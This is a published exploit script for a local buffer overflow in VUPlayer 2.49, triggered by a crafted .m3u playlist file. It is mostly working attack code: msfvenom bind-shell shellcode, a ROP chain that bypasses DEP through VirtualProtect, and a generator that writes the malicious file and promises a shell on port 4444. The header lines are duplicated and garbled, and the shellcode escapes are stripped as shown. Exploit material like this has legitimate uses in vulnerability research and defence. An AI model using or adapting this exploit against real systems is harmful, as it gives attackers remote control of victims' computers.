VUPlayer 2.49 .m3u Local Buffer Overflow

# Exploit title: VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP,ASLR)
# Date: 2020-05-22
# Exploit Author: Gobinathan L
# Vendor Homepage: http://www.vuplayer.com/
# Version: v2.4 # Exploit title: VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP,ASLR)
# Date: 2020-05-22
# Exploit Author: Gobinathan L
# Vendor Homepage: http://www.vuplayer.com/
# Version: v2.49
# Tested on: Windows 7 Professional with ALSR and Full DEP Turned ON.

# Usage : $ python <exploit>.py

#===================================[ VUPlayer 2.49 Exploit Generator ]======================================#

import struct

# msfvenom -p windows/shell_bind_tcp exitfunc=thread -b "x00x0ax0dx1a" -f c
shell = ("xd9xc9xd9x74x24xf4x5ax2bxc9xb1x53xbdxa9xc1xbf"
"xb1x83xc2x04x31x6ax13x03xc3xd2x5dx44xefx3dx23"
"xa7x0fxbex44x21xeax8fx44x55x7fxbfx74x1dx2dx4c"
"xfex73xc5xc7x72x5cxeax60x38xbaxc5x71x11xfex44"
"xf2x68xd3xa6xcbxa2x26xa7x0cxdexcbxf5xc5x94x7e"
"xe9x62xe0x42x82x39xe4xc2x77x89x07xe2x26x81x51"
"x24xc9x46xeax6dxd1x8bxd7x24x6ax7fxa3xb6xbaxb1"
"x4cx14x83x7dxbfx64xc4xbax20x13x3cxb9xddx24xfb"
"xc3x39xa0x1fx63xc9x12xfbx95x1exc4x88x9axebx82"
"xd6xbexeax47x6dxbax67x66xa1x4ax33x4dx65x16xe7"
"xecx3cxf2x46x10x5ex5dx36xb4x15x70x23xc5x74x1d"
"x80xe4x86xddx8ex7fxf5xefx11xd4x91x43xd9xf2x66"
"xa3xf0x43xf8x5axfbxb3xd1x98xafxe3x49x08xd0x6f"
"x89xb5x05x05x81x10xf6x38x6cxe2xa6xfcxdex8bxac"
"xf2x01xabxcexd8x2ax44x33xe3x45xc9xbax05x0fxe1"
"xeax9exa7xc3xc8x16x50x3bx3bx0fxf6x74x2dx88xf9"
"x84x7bxbex6dx0fx68x7ax8cx10xa5x2axd9x87x33xbb"
"xa8x36x43x96x5axdaxd6x7dx9ax95xcax29xcdxf2x3d"
"x20x9bxeex64x9axb9xf2xf1xe5x79x29xc2xe8x80xbc"
"x7excfx92x78x7ex4bxc6xd4x29x05xb0x92x83xe7x6a"
"x4dx7fxaexfax08xb3x71x7cx15x9ex07x60xa4x77x5e"
"x9fx09x10x56xd8x77x80x99x33x3cxa0x7bx91x49x49"
"x22x70xf0x14xd5xafx37x21x56x45xc8xd6x46x2cxcd"
"x93xc0xddxbfx8cxa4xe1x6cxacxec")

ret = struct.pack("<I", 0x10010158)

def create_rop_chain():

rop_gadgets = [
0x100106e1, #POP EBP RET
0x100106e1, #Ptr to POP EBP RET popped into EBP
0x10015f82, #POP EAX RET
0xfffffdff, #Value to Negate.. result in 0x201
0x10014db4, #NEG EAX RET
0x10032f72, #XCHG EAX, EBX RET
0x10015f82, #POP EAX RET
0xffffffc0, #Value to negate ..result in 0x40
0x10014db4, #NEG EAX RET
0x10038a6d, #XCHG EAX, EDX RET
0x106053e5, #POP ECX RET
0x101082cc, #Random Location with Write Access
0x1001621c, #POP EDI RET
0x10010158, #RET will be stored in EDI
0x10604154, #POP ESI RET
0x10101c02, #JMP [EAX]
0x10015f77, # POP EAX # RETN [BASS.dll]
0x10109270, # ptr to &VirtualProtect() [IAT BASSWMA.dll]
0x1001d7a5, # PUSHAD # RETN
0x10022aa7, # JMP ESP
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()
shellcode = "x90"*32 + shell


buffer = "A"*1012
buffer+= ret
buffer+= rop_chain
buffer+= shellcode
buffer+= "x90"*(2500 - len(buffer))

try:
f = open("exploit.m3u", "w")
f.write(buffer)
print("[+] Payload Generated Successfully.")
print("[+] Check for Open Port [4444] on Target Machine. A Bind shell is waiting for you..")
f.close()
except:
print("[-] Couldn't Generate Payload.")
Leave a comment